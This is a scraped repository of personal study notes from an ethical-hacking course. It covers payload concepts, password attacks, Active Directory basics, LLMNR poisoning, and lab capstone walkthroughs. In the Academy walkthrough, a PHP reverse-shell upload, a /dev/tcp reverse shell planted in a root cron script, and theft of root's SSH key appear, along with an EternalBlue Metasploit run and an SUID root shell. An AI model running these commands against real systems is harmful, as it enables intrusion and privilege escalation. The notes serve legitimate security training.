and “change” which are all synonyms of “set”. Fun fact: “set” has the most definitions of any word in the dictionary. 64 | 65 | ``` 66 | ~set 67 | ``` 68 | 69 | **Glob pattern:** 70 | Putting an asterisk in a search tells Google ‘I don’t know what goes here’. Basically, it’s really good for finding half remembered song lyrics or names of things. 71 | 72 | ``` 73 | site:*.com 74 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/10. Exploitation Basics/01. Shells & Payloads.md: -------------------------------------------------------------------------------- 1 | # Shells & Payloads 2 | > 23.12.2023 3 | --- 4 | 5 | ### Reverse Shell VS Bind Shell: 6 | 7 | **Payload Execution:** 8 | - `RS:` The attacker injects or uploads a piece of code (often a shell script or executable) onto the target system. This code is designed to connect back to the attacker's machine. 9 | 10 | - `BS:`The attacker injects or uploads a piece of code onto the target system. This code is designed to connect to the specified IP address and port on the attacker's machine. 11 | 12 | **Connection Establishment:** 13 | - `RS:`The code on the target system starts a network connection to the specified IP address and port on the attacker's machine. 14 | - `BS:`When the injected code runs on the target system, it establishes a connection to the waiting service on the attacker's machine. 15 | 16 | **Interactive Shell:** 17 | - `RS:`Once the connection is established, the attacker gains control over the target system and can interact with it through a command shell. This allows the attacker to execute commands on the compromised system as if they were physically present. 18 | - `BS:`Once the connection is established, the attacker gains control over the target system and can interact with it through a command shell. 19 | 20 | **Usage:** 21 | - `RS:`Reverse shells are commonly used when the target system is behind a firewall, and incoming connections are restricted. By having the target system initiate the connection, the attacker can bypass certain network security measures. 22 | - `BS:`Bind shells are useful when the target system can make outgoing connections, but incoming connections are restricted. This allows the attacker to set up a service that waits for the target to connect to it. 23 | 24 | 25 | ### Staged Payloads: 26 | 27 | **Initial Stage:** 28 | - The attacker delivers a smaller and relatively simple payload to the target system. This initial payload is responsible for establishing a connection back to the attacker's machine. 29 | 30 | **Second Stage:** 31 | - Once the connection is established, the attacker sends a second, more complex payload. This payload is usually larger and contains the actual malicious code or exploit. 32 | 33 | **Advantages:** 34 | - Staged payloads are often used when there are limitations on the size of the initial payload that can be delivered. This could be due to network constraints or security measures that may detect large or suspicious data transfers. 35 | 36 | **Disadvantages:** 37 | - The staged approach introduces some latency as it requires multiple steps. Additionally, if the first stage is detected and blocked, the attack may be thwarted before the more sophisticated second stage is delivered. 38 | 39 | ### Non-Staged Payloads: 40 | 41 | **Delivery:** 42 | - The attacker sends a single, comprehensive payload to the target system. 43 | 44 | **Execution:** 45 | - Upon execution of the payload, it performs all necessary tasks, including establishing a connection back to the attacker's machine and executing the intended malicious actions. 46 | 47 | **Advantages:** 48 | - Non-staged payloads are often simpler to implement and can be more straightforward. They reduce the latency associated with staged payloads since all malicious activities are contained in a single payload. 49 | 50 | **Disadvantages:** 51 | - Larger payloads may be more easily detected by security measures. Additionally, if the initial payload is blocked, the entire attack may be thwarted. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/10. Exploitation Basics/02. Brute Force Attacks, Credential Stuffing & Password Spraying.md: -------------------------------------------------------------------------------- 1 | #   Brute Force Attacks, Credential Stuffing & Password Spraying 2 | > 23.12.2023 3 | --- 4 | 5 | ### Brute Force Attacks: 6 | 7 | - **Method:** In a brute force attack, an attacker systematically tries all possible combinations of passwords until the correct one is found. 8 | - **Targets:** It can target login credentials, encryption keys, or any system protected by passwords. 9 | - **Tools:** Automated scripts or tools are often used to speed up the process. 10 | - **Time-Consuming:** The success of a brute force attack depends on the complexity of the password and the available computational power. 11 | 12 | ### Credential Stuffing: 13 | 14 | - **Method:** In credential stuffing, attackers use username and password combinations obtained from previous data breaches to gain access to other accounts where users have reused passwords. 15 | - **Targets:** It exploits the common practice of users reusing passwords across multiple online services. 16 | - **Automation:** Automated tools are used to test large numbers of username-password pairs across various websites. 17 | 18 | ### 3. Password Spraying: 19 | 20 | - **Method:** Password spraying is an attack where the attacker systematically tries a small number of commonly used passwords against many accounts before moving on to the next set of passwords. 21 | - **Targets:** It targets a large number of accounts with a few, commonly used passwords to avoid triggering account lockouts. 22 | - **Detection Avoidance:** Password spraying is designed to avoid detection mechanisms that lock accounts after a certain number of failed login attempts. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy02.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev02.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev03.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/01. Blue.md: -------------------------------------------------------------------------------- 1 | # Blue 2 | > 12.11.2023 3 | --- 4 | ## Enumeration 5 | 6 | **Performing an Nmap scan** 7 | ```bash 8 | nmap -sC -sV --script vuln 10.10.1.152 9 | ``` 10 | 11 | ``` 12 | Not shown: 991 closed tcp ports (reset) 13 | PORT STATE SERVICE VERSION 14 | 135/tcp open msrpc Microsoft Windows RPC 15 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 16 | 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 17 | 49152/tcp open msrpc Microsoft Windows RPC 18 | 49153/tcp open msrpc Microsoft Windows RPC 19 | 49154/tcp open msrpc Microsoft Windows RPC 20 | 49155/tcp open msrpc Microsoft Windows RPC 21 | 49156/tcp open msrpc Microsoft Windows RPC 22 | 49157/tcp open msrpc Microsoft Windows RPC 23 | MAC Address: 08:00:27:2A:95:91 (Oracle VirtualBox virtual NIC) 24 | Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows 25 | 26 | Host script results: 27 | | smb-vuln-ms17-010: 28 | | VULNERABLE: 29 | | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 30 | | State: VULNERABLE 31 | | IDs: CVE:CVE-2017-0143 32 | | Risk factor: HIGH 33 | | A critical remote code execution vulnerability exists in Microsoft SMBv1 34 | | servers (ms17-010). 35 | | 36 | | Disclosure date: 2017-03-14 37 | | References: 38 | | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 39 | | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ 40 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 41 | |_smb-vuln-ms10-054: false 42 | |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 43 | ``` 44 | 45 | The target is vulnerable to smb-vuln-ms17-010 (Eternal Blue) remote code execution. 46 | 47 | ## Exploitation with MSF 48 | 49 | ```bash 50 | msfconsole -q 51 | search eternal blue 52 | use exploit/windows/smb/ms17_010_eternalblue 53 | set LHOST eth0 54 | set RHOSTS 10.10.1.152 55 | run 56 | ``` 57 | 58 | ``` 59 | [*] Started reverse TCP handler on 10.10.1.100:4444 60 | [*] 10.10.1.152:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check 61 | [+] 10.10.1.152:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) 62 | [*] 10.10.1.152:445 - Scanned 1 of 1 hosts (100% complete) 63 | [+] 10.10.1.152:445 - The target is vulnerable. 64 | [*] 10.10.1.152:445 - Connecting to target for exploitation. 65 | [+] 10.10.1.152:445 - Connection established for exploitation. 66 | [+] 10.10.1.152:445 - Target OS selected valid for OS indicated by SMB reply 67 | [*] 10.10.1.152:445 - CORE raw buffer dump (38 bytes) 68 | [*] 10.10.1.152:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima 69 | [*] 10.10.1.152:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service 70 | [*] 10.10.1.152:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 71 | [+] 10.10.1.152:445 - Target arch selected valid for arch indicated by DCE/RPC reply 72 | [*] 10.10.1.152:445 - Trying exploit with 12 Groom Allocations. 73 | [*] 10.10.1.152:445 - Sending all but last fragment of exploit packet 74 | [*] 10.10.1.152:445 - Starting non-paged pool grooming 75 | [+] 10.10.1.152:445 - Sending SMBv2 buffers 76 | [+] 10.10.1.152:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. 77 | [*] 10.10.1.152:445 - Sending final SMBv2 buffers. 78 | [*] 10.10.1.152:445 - Sending last fragment of exploit packet! 79 | [*] 10.10.1.152:445 - Receiving response from exploit packet 80 | [+] 10.10.1.152:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! 81 | [*] 10.10.1.152:445 - Sending egg to corrupted connection. 82 | [*] 10.10.1.152:445 - Triggering free of corrupted buffer. 83 | [*] Sending stage (200774 bytes) to 10.10.1.152 84 | [*] Meterpreter session 1 opened (10.10.1.100:4444 -> 10.10.1.152:49158) at 2023-11-12 13:58:17 +0100 85 | [+] 10.10.1.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 86 | [+] 10.10.1.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 87 | [+] 10.10.1.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 88 | ``` 89 | 90 | I was able to gain administrator access after the exploit has ended. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/02. Academy.md: -------------------------------------------------------------------------------- 1 | # Academy 2 | > 12.10.2023 3 | --- 4 | ## Enumeration 5 | 6 | **Nmap scan** 7 | ```bash 8 | nmap -sC -sV 10.10.1.153 9 | ``` 10 | 11 | ``` 12 | Not shown: 997 closed tcp ports (reset) 13 | PORT STATE SERVICE VERSION 14 | 21/tcp open ftp vsftpd 3.0.3 15 | | ftp-syst: 16 | | STAT: 17 | | FTP server status: 18 | | Connected to ::ffff:10.10.1.100 19 | | Logged in as ftp 20 | | TYPE: ASCII 21 | | No session bandwidth limit 22 | | Session timeout in seconds is 300 23 | | Control connection is plain text 24 | | Data connections will be plain text 25 | | At session startup, client count was 2 26 | | vsFTPd 3.0.3 - secure, fast, stable 27 | |_End of status 28 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 29 | |_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt 30 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 31 | | ssh-hostkey: 32 | | 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA) 33 | | 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA) 34 | |_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519) 35 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 36 | |_http-server-header: Apache/2.4.38 (Debian) 37 | |_http-title: Apache2 Debian Default Page: It works 38 | MAC Address: 08:00:27:2B:D9:FB (Oracle VirtualBox virtual NIC) 39 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 40 | ``` 41 | 42 | The FTP server has anonymous login on! It contains an note: 43 | 44 | ```note.txt 45 | Hello Heath ! 46 | Grimmie has setup the test website for the new academy. 47 | I told him not to use the same password everywhere, he will change it ASAP. 48 | 49 | 50 | I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command: 51 | 52 | INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES 53 | ('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', ''); 54 | 55 | The StudentRegno number is what you use for login. 56 | 57 | 58 | Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ? 59 | We can always adapt it to our needs. 60 | 61 | -jdelta 62 | ``` 63 | 64 | We have gotten the following credentials: 65 | ``` 66 | StudentRegno: 10201321 67 | studentPhoto: "" 68 | password: cd73502828457d15655bbd7a63fb0bc8 69 | studentName: Rum Ham 70 | pincode: 777777 71 | session: "" 72 | department: "" 73 | semester: "" 74 | cgpa: 7.60 75 | creationdate: 2021-05-29 14:36:56 76 | updationDate: "" 77 | ``` 78 | 79 | The most important credentials are the *StudentRegno* and the *password* hash. 80 | 81 | The hash can be cracked by using [CrackStation](https://crackstation.net/): "student" "MD5" 82 | 83 | ## Webserver 84 | 85 | Visiting the webserver, I discovered the Apache standard site. Further directory enumeration can be done with "feroxbuster": 86 | 87 | ```bash 88 | feroxbuster --url http://10.10.1.153 -x php,html,txt 89 | ``` 90 | 91 | ``` 92 | 404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 93 | 403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 94 | 200 GET 368l 933w 10701c http://10.10.1.153/index.html 95 | 301 GET 9l 28w 315c http://10.10.1.153/phpmyadmin => http://10.10.1.153/phpmyadmin/ 96 | 200 GET 24l 126w 10356c http://10.10.1.153/icons/openlogo-75.png 97 | 200 GET 368l 933w 10701c http://10.10.1.153/ 98 | 301 GET 9l 28w 312c http://10.10.1.153/academy => http://10.10.1.153/academy/ 99 | ... 100 | ``` 101 | 102 | The directory: "academy" and "phpmyadmin" can be found. 103 | 104 | ## Academy 105 | 106 | ![[Capstone Academy01.png]] 107 | 108 | We enter the credentials we have gotten earlier, to login into the account. Now go to the "My Profile" section, we find an unprotected upload section: 109 | 110 | ![[Capstone Academy02.png]] 111 | 112 | To exploit this, start an netcat listener: 113 | 114 | ```bash 115 | nc -lnvp 4200 116 | ``` 117 | 118 | and upload an reverse php shell with the host IP and port "4200": 119 | [php-reverse shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php). 120 | 121 | If everything goes right, we gain an shell as www-data. 122 | 123 | ## Lateral movement 124 | 125 | Lets upload ["linpeas.sh"](https://github.com/carlospolop/PEASS-ng/releases/download/20231112-0a42c550/linpeas.sh) to enumerate the system: 126 | 127 | ```bash 128 | # Attacker 129 | python3 -m http.server 6969 130 | 131 | # Victim 132 | cd /tmp 133 | wget http://10.10.1.100:6969/linpeas.sh 134 | bash linpeas.sh 135 | ``` 136 | 137 | After analyzing the output, we see an leaked password in a php file: 138 | 139 | ``` 140 | ╔══════════╣ Searching passwords in config PHP files 141 | $cfg['Servers'][$i]['AllowNoPassword'] = false; 142 | $cfg['Servers'][$i]['AllowNoPassword'] = false; 143 | $cfg['Servers'][$i]['AllowNoPassword'] = false; 144 | $cfg['ShowChgPassword'] = true; 145 | $mysql_password = "My_V3ryS3cur3_P4ss"; 146 | $mysql_password = "My_V3ryS3cur3_P4ss"; 147 | ``` 148 | 149 | Since the user "grimmie" exists, we try to ssh into the user using the following command: 150 | 151 | ```bash 152 | ssh grimmie@10.10.1.153 153 | password: My_V3ryS3cur3_P4ss 154 | ``` 155 | 156 | We successfully gotten the grimmie user. 157 | 158 | ## Privilege escalation 159 | 160 | In the grimmie's home directory, we find a file called backup.sh 161 | By looking at the "/etc/crontab" file, we see that this file will be executed by root every few seconds. So add a reverse shell in the second line of the backup.sh file and start an listener on another terminal: 162 | 163 | ```bash 164 | nc -lnvp 4201 165 | ``` 166 | 167 | **backup.sh** 168 | ```bash 169 | #!/bin/bash 170 | 171 | /bin/bash -i >& /dev/tcp/10.10.1.100/4201 0>&1 172 | 173 | cat /root/.ssh/id_rsa >> /tmp/id_rsa 174 | 175 | rm /tmp/backup.zip 176 | zip -r /tmp/backup.zip /var/www/html/academy/includes 177 | chmod 700 /tmp/backup.zip 178 | ``` 179 | 180 | with that, we gain the root privilege! 181 | 182 | ## Root-Flag 183 | 184 | ``` 185 | cat flag.txt 186 | 187 | Congratz you rooted this box ! 188 | Looks like this CMS isn't so secure... 189 | I hope you enjoyed it. 190 | If you had any issue please let us know in the course discord. 191 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/11. New Capstone/04. Blackpearl.md: -------------------------------------------------------------------------------- 1 | # Blackpearl 2 | > 28.07.2024 3 | --- 4 | 5 | # Ip: 10.0.2.154 6 | ## Enumeration 7 | 8 | **Nmap Scan:** 9 | ``` 10 | PORT STATE SERVICE VERSION 11 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 12 | | ssh-hostkey: 13 | | 2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA) 14 | | 256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA) 15 | |_ 256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519) 16 | 53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux) 17 | | dns-nsid: 18 | |_ bind.version: 9.11.5-P4-5.1+deb10u5-Debian 19 | 80/tcp open http nginx 1.14.2 20 | |_http-server-header: nginx/1.14.2 21 | |_http-title: Welcome to nginx! 22 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 23 | ``` 24 | 25 | **Domain:** 26 | ``` 27 | blackpearl.tcm 28 | ``` 29 | 30 | **Directory busting:** 31 | ``` 32 | http://10.0.2.154/secret 33 | http://blackpearl.tcm/navigate 34 | ``` 35 | 36 | **File Downloaded:** 37 | *secret* 38 | ``` 39 | OMG you got r00t ! 40 | 41 | 42 | Just kidding... search somewhere else. Directory busting won't give anything. 43 | 44 | 45 | 46 | - Alek 47 | ``` 48 | 49 | **Navigate service:** 50 | - Version: 2.8 51 | 52 | ## Exploit: 53 | ``` 54 | navigate_cms_rce (metasploit) / successful 55 | CVE-2018-17553 CVE-2018-17552 56 | ``` 57 | 58 | ## Lateral Movement 59 | **SUID:** 60 | ``` 61 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper 62 | /usr/lib/eject/dmcrypt-get-device 63 | /usr/lib/openssh/ssh-keysign 64 | /usr/bin/umount 65 | /usr/bin/newgrp 66 | /usr/bin/mount 67 | /usr/bin/php7.3 ! 68 | /usr/bin/su 69 | /usr/bin/chfn 70 | /usr/bin/passwd 71 | /usr/bin/chsh 72 | /usr/bin/gpasswd 73 | ``` 74 | 75 | ## Root via SUID: 76 | ``` 77 | 78 | CMD="/bin/sh" 79 | /usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);" 80 | 81 | ``` 82 | 83 | ## Root Flag: 84 | ``` 85 | Good job on this one. 86 | Finding the domain name may have been a little guessy, 87 | but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF. 88 | ``` 89 | 90 | # Usernames & Passwords: 91 | - Alek -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/12. Active Directory Overview/01. Active Directory Overview.md: -------------------------------------------------------------------------------- 1 | # Active Directory Overview 2 | > 23.12.2023 3 | --- 4 | 5 | **What is AD?** 6 | - Active Directory (AD) is a directory service developed by Microsoft that provides a centralized and standardized system. 7 | - Manages and organizes information about networked resources, such as computers, users, groups, and other devices within a network. 8 | - It plays a crucial role in Windows-based environments. 9 | 10 | **Domain:** 11 | - A domain is a logical grouping of networked computers that share a common security and authentication database. Active Directory domains are identified by DNS names. 12 | 13 | **Forest:** 14 | - A forest is a collection of one or more domains that share a common schema, configuration, and global catalog. It establishes a trust relationship between domains. 15 | 16 | **Domain Controller (DC):** 17 | - A domain controller is a server that manages security authentication requests within a domain. It stores a writable copy of the Active Directory database and authenticates users and computers. 18 | 19 | **Organizational Unit (OU):** 20 | - An organizational unit is a container within a domain that can be used to organize and manage objects like users, groups, and computers. It allows administrators to apply Group Policy settings and delegate administrative authority. 21 | 22 | **Group Policy:** 23 | - Group Policy is a feature that allows administrators to implement and enforce specific configurations for users and computers within an Active Directory environment. It helps in managing security settings, software installation, and other configurations. 24 | 25 | **Security Identifier (SID):** 26 | - A unique alphanumeric identifier assigned to each security principal (user, group, or computer) in Active Directory. SIDs are used for authentication and access control. 27 | 28 | **Global Catalog (GC):** 29 | - The global catalog is a specialized domain controller that contains a partial replica of the Active Directory database, including a subset of all objects in the forest. It facilitates searching for objects across the entire forest. 30 | 31 | **Trust Relationship:** 32 | - Trust relationships define how domains within a forest trust each other for authentication purposes. They allow users in one domain to access resources in another domain. 33 | 34 | **Active Directory Database:** 35 | - The Active Directory database stores information about objects such as users, groups, and computers. It is replicated among domain controllers within a domain and across domains in a forest. 36 | 37 | **LDAP (Lightweight Directory Access Protocol):** 38 | - LDAP is the protocol used to communicate with Active Directory for querying and modifying directory information. It operates on TCP/IP and provides a standard way to access directory services. 39 | 40 | **Kerberos Authentication:** 41 | - Active Directory uses the Kerberos protocol for secure authentication between clients and servers. It provides strong authentication and supports single sign-on. 42 | 43 | **DNS (Domain Name System):** 44 | - DNS is crucial for Active Directory, as it is used for domain naming and locating domain controllers. Proper DNS configuration is essential for the functioning of Active Directory. 45 | 46 | **Schema:** 47 | - The schema defines the structure and properties of objects in the directory. It is common across all domains in a forest and is modified to extend or customize the types of objects that can be stored. 48 | 49 | **Replication:** 50 | - Active Directory replication ensures that changes made to the directory database on one domain controller are synchronized to all other domain controllers within the domain and across domains in the forest. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/12. Active Directory Overview/02. Physical & Logical AD Components.md: -------------------------------------------------------------------------------- 1 | # Physical & Logical AD Components 2 | > 23.12.2023 3 | --- 4 | 5 | ### Physical AD Components: 6 | 7 | **Domain Controllers (DCs):** 8 | - **Physical:** Tangible servers hosting AD services. 9 | - **Role:** Execute authentication requests, store AD database. 10 | 11 | **Sites:** 12 | - **Physical:** Represents actual locations connected by high-speed links. 13 | - **Role:** Optimizes replication and authentication based on physical proximity. 14 | 15 | **Subnets:** 16 | - **Physical:** Network segments with specific IP address ranges. 17 | - **Role:** Linked to sites, aids in efficient replication and communication. 18 | 19 | **Network Infrastructure:** 20 | - **Physical:** Hardware devices facilitating network communication. 21 | - **Role:** Enables the flow of AD-related traffic between resources. 22 | 23 | ### Logical AD Components: 24 | 25 | **Active Directory Database:** 26 | - **Logical:** Repository storing data about network resources. 27 | - **Role:** Logical data store accessible by DCs. 28 | 29 | **Organizational Units (OUs):** 30 | - **Logical:** Containers for logical organization and management. 31 | - **Role:** Hierarchical structure for delegation and Group Policy. 32 | 33 | **Domains:** 34 | - **Logical:** Logical groupings of networked resources. 35 | - **Role:** Forms security and administrative boundaries. 36 | 37 | **Forest:** 38 | - **Logical:** Collection of domains with shared schema and configuration. 39 | - **Role:** Defines top-level structure, establishes trust. 40 | 41 | **Global Catalog (GC):** 42 | - **Logical:** Partial replica of objects across the entire forest. 43 | - **Role:** Facilitates cross-domain object searches. 44 | 45 | **Schema:** 46 | - **Logical:** Defines structure and attributes of stored objects. 47 | - **Role:** Determines object types and properties. 48 | 49 | **Trust Relationships:** 50 | - **Logical:** Logical links enabling secure authentication across domains. 51 | - **Role:** Establishes trust, allows access to resources. 52 | 53 | **Group Policy:** 54 | - **Logical:** Set of rules applied to users and computers. 55 | - **Role:** Centrally manages security and configuration settings. 56 | 57 | **Logical Structure:** 58 | - **Logical:** Arrangement of domains, OUs, and objects. 59 | - **Role:** Defines the logical organization of resources. 60 | 61 | ### Comparison: 62 | 63 | 1. **Visibility:** 64 | - **Physical:** Observable and measurable components. 65 | - **Logical:** Abstract, representing the structure and organization. 66 | 67 | 2. **Management:** 68 | - **Physical:** Involves hardware maintenance and network upkeep. 69 | - **Logical:** Involves organizational design, policy management, and security configuration. 70 | 71 | 3. **Flexibility:** 72 | - **Physical:** Requires physical changes for expansion or relocation. 73 | - **Logical:** Flexible and adaptable through logical configurations. 74 | 75 | 4. **Scaling:** 76 | - **Physical:** Scaling may involve adding new hardware. 77 | - **Logical:** Scaling involves organizational and policy adjustments. 78 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/.DS_Store -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/.DS_Store -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/LLMNR Poisoning Overview 01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/LLMNR Poisoning Overview 01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 01.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 01.webp -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 02.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 02.webp -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 03.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 03.webp -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 04.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/00. image/Passback Attacks 04.webp -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/01. LLMNR Poisoning Overview.md: -------------------------------------------------------------------------------- 1 | # LLMNR Poisoning Overview 2 | > 05.05.2024 3 | 4 | **What is Link-Local Multicast Name Resolution (LLMR):** 5 | - Its used to identify hosts when DNS fails 6 | - Key flaw is that the service uses a users username and NTLMv2 hash when responding. 7 | - Used to be NBT-NS (*Netbios Name Service*) 8 | 9 | **Example:** 10 | ![[LLMNR Poisoning Overview 01.png]] 11 | 12 | 1. Victim calls for `\\hackm` instead of `\\hackme` 13 | 2. Server knows about `\\hackme` but not `\\hackm` 14 | 3. Victim broadcasts in the network asking if anyone knows about `\\hackme` 15 | 4. Intercept this request and respond to that, asks for the hash from the victim. 16 | 5. Crack the hash 17 | 18 | ## Practical Example 19 | 20 | **Step1: Run Responder** 21 | 22 | - Responds to the traffic broadcasted by victims 23 | - Grab the hash if one is received. 24 | 25 | ```bash 26 | sudo responder -I tun0 -dwP 27 | ``` 28 | 29 | **Step2 An Event Occurs** 30 | 31 | - A victim broadcasts the message 32 | 33 | **Step3: Get Dem Hashes** 34 | 35 | - Get the hash from responder offline to further evaluate it 36 | 37 | **Step4: Crack them Hashes** 38 | 39 | - Use tools like Hashcat to crack the offline hash: 40 | ```bash 41 | hashcat -m 5600 hash.txt rockyou.txt 42 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/02. Capturing Hashes with Responder.md: -------------------------------------------------------------------------------- 1 | # 